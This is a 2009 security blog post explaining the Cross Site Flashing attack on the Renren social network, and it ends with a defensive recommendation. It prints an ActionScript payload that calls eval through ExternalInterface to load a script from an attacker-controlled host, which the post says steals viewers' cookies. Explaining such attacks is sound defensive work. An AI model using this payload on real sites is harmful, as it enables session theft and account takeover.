
XSF: Web attack encapsulated in Flash

Published 2009-08-27 by Leandro Ferrari at https://www.talsoft-security.com/site/xsf-ataque-web-encapsulado-en-flash/

I suppose our readers will have heard about the worm that hit the social network Twitter back in April. In fact, Laura published an article about the hiring of its creator here: http://www.securitybydefault.com/2009/04/el-creador-del-gusano-de-twitter.html. That attack exploited an XSS (Cross-Site Scripting) vulnerability to impersonate a large number of affected users and tweet from their accounts.

This time the target of the attacks has been the Chinese social network Renren (http://reg.renren.com/xn6207.do?ss=10112&rt=26). The technique used was a variant of XSS encapsulated in Flash files, and as a result the attack has been named XSF, or Cross Site Flashing (http://www.owasp.org/index.php/Testing_for_Cross_site_flashing_%28OWASP-DV-004%29).

How was the attack carried out?

Like Facebook or Tuenti, the Renren social network lets users share multimedia content, either as video or in Flash format. For the latter, the link to an SWF file is built by a function called playswf(), which generates a piece of markup like this:

```javascript
// String built by playswf() for the embedded SWF (o = the player options object)
'<embed src="' + o.filename + '" type="application/x-shockwave-flash" ' +
'width="' + (o.width || "320") + '" height="' + (o.height || "240") + '" allowFullScreen="true" ' +
'wmode="' + (o.wmode || "transparent") + '" allowScriptAccess="always"></embed>'
// allowScriptAccess="always" is the setting discussed below
```

The "allowScriptAccess" parameter deserves special attention. It limits the level of access the embedded object has to the rest of the HTML page. If allowScriptAccess="sameDomain" is set, the Flash object only gets access to the HTML page when it is loaded from the same domain, so the attacker would first need to upload the file to be executed to that same domain using some other technique.
However, when the allowScriptAccess parameter has the value "always", the Flash object has access to any part of the HTML session, for example the cookies. One, two, three... answer again: the cookies.

From here, the rest of the attack consists of creating a Flash object that carries a piece of code running malicious JavaScript, which sends the cookies of every user who views that "innocent" Flash file to a remote location. From then on, the attacker has access to the identities of a large number of users.

For example:

```actionscript
// JavaScript snippet, as a string, that injects a remote script into the hosting page
// (the attacker-controlled URL is the one quoted in the original post)
var fun = 'var x=document.createElement("SCRIPT");x.src="http://www.delatacante.com/malicioso.js"; x.defer=true;document.getElementsByTagName("HEAD")[0].appendChild(x);';
// With allowScriptAccess="always", ExternalInterface can call eval() on the hosting page
flash.external.ExternalInterface.call('eval', fun);
```

Meanwhile, the end user sees the Flash content without knowing that malicious JavaScript has run and stolen their cookie.

The attack on the Renren social network additionally used the victim's credentials to send the video to all of their contacts.

As you can see: XSS encapsulated in a Flash object embedded in a web page... thanks to excessive permissions granted to that object. Recommendation: if you run any kind of website that allows sharing this type of file, force the "allowScriptAccess" parameter to "sameDomain".

Source: Security By